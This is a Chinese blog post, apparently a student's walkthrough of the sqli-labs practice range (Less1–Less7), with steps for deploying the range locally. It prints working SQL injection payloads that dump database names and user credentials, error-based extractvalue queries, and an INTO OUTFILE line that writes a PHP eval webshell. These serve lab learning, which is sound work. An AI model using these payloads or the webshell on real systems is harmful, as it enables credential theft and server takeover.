前言
最近也是学到渗透这块了,目前使用sqli-labs这一靶场进行了一些联系,记录一下练习过程。
这里给出相关的文件:
GitHub:https://github.com/skyblueee/sqli-labs-php7
gitee:https://gitee.com/tao-guoqing/sqli-labs-php7
靶场部署
部署流程
最近因电脑原因,重装系统后准备装个双系统试试,但出了点还没解决的问题,这里我使用PHPstudy进行部署。
这里给出PHPstudy下载地址:https://www.xp.cn/
将sqli-labs解压后放入PHPstudy下的目录即可
在配置好后对sqli-labs进行修改,在sql-connections/db-creds.inc修改自己的mysql用户名和密码
这里PHPstudy自带的Mysql默认的用户名与密码均为root
修改完成后浏览器网址输入127.0.0.1/sqli-labs-php7-master即可进入靶场
抑或是在PHPstudy中直接打开网址
部署成功界面
关卡流程
Less1
这里先根据提示使用get进行注入测试
这里返回了SQL错误提示,可以判断出此处有注入点,此处可使用单引号进行注入。
这里使用union select或是使用order by来检测列数
之后便可以使用database()进行爆破,以获取表名
现在我们可以知道表名为security,以此为基础使用table_name得到表中的字段名
?id=-1' union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema='security' and table_name='users' -- a
再通过获取的字段名获取具体数据
?id=-1' Union Select 1,2,group_concat(concat_ws(':',username,password))FROM security.users -- a
Less2
展示界面与Less1相同
使用?id= -1' union select 1,2,3 -- a注入后报错
经过测试后判断为Integer类型参数 ,数值型的参数后面无需单引号,字符串型才需要补,这里去掉单引号
?id= -1 union select 1,2,3 -- a
成功获取结果
后续操作同Less1,不在赘述。
Less3
正常注入报错
此处需注意到提示的报错信息输入数据后多了个括号 )
说明需要正确补全
?id= -1') union select 1,2,3 -- a
成功查询
Less4
本关形同Less3,需要补全'")
? id=-1'") union select 1,2,database() -- a
Less5
尝试爆破注入
使用database()进行爆库
?id=' union select extractvalue(1,concat('~','~',database())) -- a
爆表
?id=' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')) -- a
爆破数据
?id=' and extractvalue(1,concat('~',(select group_concat(username) from security.users),'~')) -- a
Less6
查看报错
爆库
?id=" union select extractvalue(1,concat('~',database(),'~')) -- a
剩余步骤参照Less5
Less7
提示使用文件进行注入
mysql读写文件需要更改mysql配置,找到mysql里的my.ini,在[mysqld]中加入 secure-file-priv= 保存并重启mysql即可
使用basedir()与datadir()获取路径
basedir()指定了安装MYSQL的安装路径
datadir()指定了安装MYSQL的数据文件路径
使用本漏洞需要满足
- mysql的用户权限必须为root
- 知道网站的物理路径
- 在variables里的secure_file_priv参数必须是什么都没有的情况
爆库
?id=1')) union select 1,database(),3 into outfile "C:\\PHPstudy\\WWW\\sqli-labs-master\\Less-7\\database.txt" -- a
这会在服务器生成查询结果,但是咱们拿不到(
使用php的一句话木马进行注入
?id=1')) union select 1,'<?php @eval($_POST["abc"]);?>',3 into outfile "E:\\PHPstudy\\WWW\\sqli-labs-master\\Less-7\\muma.php" -- a
好!木马直接被ban掉(
Less8
使用burp suite来进行抓包操作,暴力破解数据库
burp suite出现错误,本题及后续没搞出来,进行一个快速的跳过,剩下的题目后面再补叭(